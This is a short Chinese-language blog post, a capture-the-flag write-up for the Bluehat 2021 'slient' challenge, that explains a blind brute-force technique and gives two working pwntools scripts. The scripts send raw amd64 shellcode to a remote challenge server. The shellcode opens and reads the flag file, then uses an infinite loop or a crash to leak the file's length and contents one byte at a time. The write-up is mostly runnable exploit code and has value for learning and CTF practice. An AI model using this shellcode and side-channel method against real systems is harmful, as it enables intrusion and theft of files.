blog of chuj

Bluehat2021-slient-WP

Posted on Apr 29, 2021

这题没啥意思,就是爆破。由于无法输出任何东西,需要有能代表是正确的标志,可以使用 jmp 0 的方法,如果爆破正确则 jmp 0,否则 jmp 到一个乱七八糟的地方造成段错误,这样通过是否有 got eof 就可以判断了。

使用 shellcraft 可以获得 shellcode

shellcode = asm(shellcraft.amd64.syscall('SYS_open',0x10000 + 0x30,0).rstrip())
shellcode += asm(shellcraft.amd64.syscall('SYS_read',3,0x10500,40).rstrip())
shellcode += asm("cmp rax,12")
shellcode += "\x75\x02" # jne 2

shellcode += "\xeb\xfe" # jmp 0
shellcode = shellcode.ljust(0x30,'a')

shellcode = asm(shellcraft.amd64.pushstr("/home/pwn/flag"))

#!/usr/bin/env python
# coding=utf-8
from pwn import *
import struct
context.log_level = 'debug'
context.arch = "amd64"
context.terminal = ["tmux","splitw","-h"]

for i in range(18,19):
    sh = remote("8.140.177.7",40334)
    #sh = process("./chall")
    shellcode = "\x6a\x02\x58\xbf\x01\x01\x02\x01\x81\xf7\x31"
    shellcode += "\x01\x03\x01\x31\xf6\x0f\x05\x31\xc0\x6a\x03"
    shellcode += "\x5f\x6a\x28\x5a\xbe\x01\x01\x02\x01\x81\xf6"
    shellcode += "\x01\x04\x03\x01\x0f\x05\x48\x83\xf8"
    shellcode += struct.pack("B",i)
    shellcode += "\x75\x02\xeb\xfe\x61"
    #shellcode += "\x2f\x68\x6f\x6d\x65\x2f\x70\x77\x6e\x2f\x66\x6c\x61\x67\x00"
    shellcode += "../pwn/flag"
    log.success(str(i))
    sh.sendafter("box.\n",shellcode)
    sh.interactive()
    sh.close()

通过这个脚本可以获得 flag 的长度,同时也可以套出一个更短的访问 flag 的路径 “../pwn/flag”,然后进行之后对 flag 内容的爆破,脚本如下

#!/usr/bin/env python
# coding=utf-8
from pwn import *
import struct
context.terminal = ["tmux","splitw","-h"]
context.log_level = 'debug'

liter = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>
flag = "flag{k33p_qu14t"

#for i in range(4,18):
for j in range(0,len(liter)):
    try:
        sh = remote("8.140.177.7",40334)
        #sh = process("./chall")

        shellcode = "\x6a\x02\x58\xbf\x01\x01\x02\x01\x81\xf7\x34"
        shellcode += "\x01\x03\x01\x31\xf6\x0f\x05\x31\xc0\x6a\x03"
        shellcode += "\x5f\x6a\x28\x5a\xbe\x01\x01\x02\x01\x81\xf6"
        shellcode += "\x01\x04\x03\x01\x0f\x05\x8a\x04\x25"
        shellcode += p32(0x10500 + 15)
        shellcode += "\x3C"
        shellcode += struct.pack("B",ord(liter[j]))
        #shellcode += struct.pack("B",ord('q'))
        shellcode += "\x75\x02\xeb\xfe\x61\x2e\x2e\x2f\x70\x77\x6e\x2f\x66\x6c\x61\x67"

        log.success(liter[j])
        #log.success(flag[j])
        sh.recvuntil("Welcome")
        #gdb.attach(proc.pidof(sh)[0])
        sh.sendafter("box.\n",shellcode)
        #sh.recvuntil(EOF)
        sh.interactive()
    except:
        sh.close()

最后得出 flag:flag{k33p_qu14t!}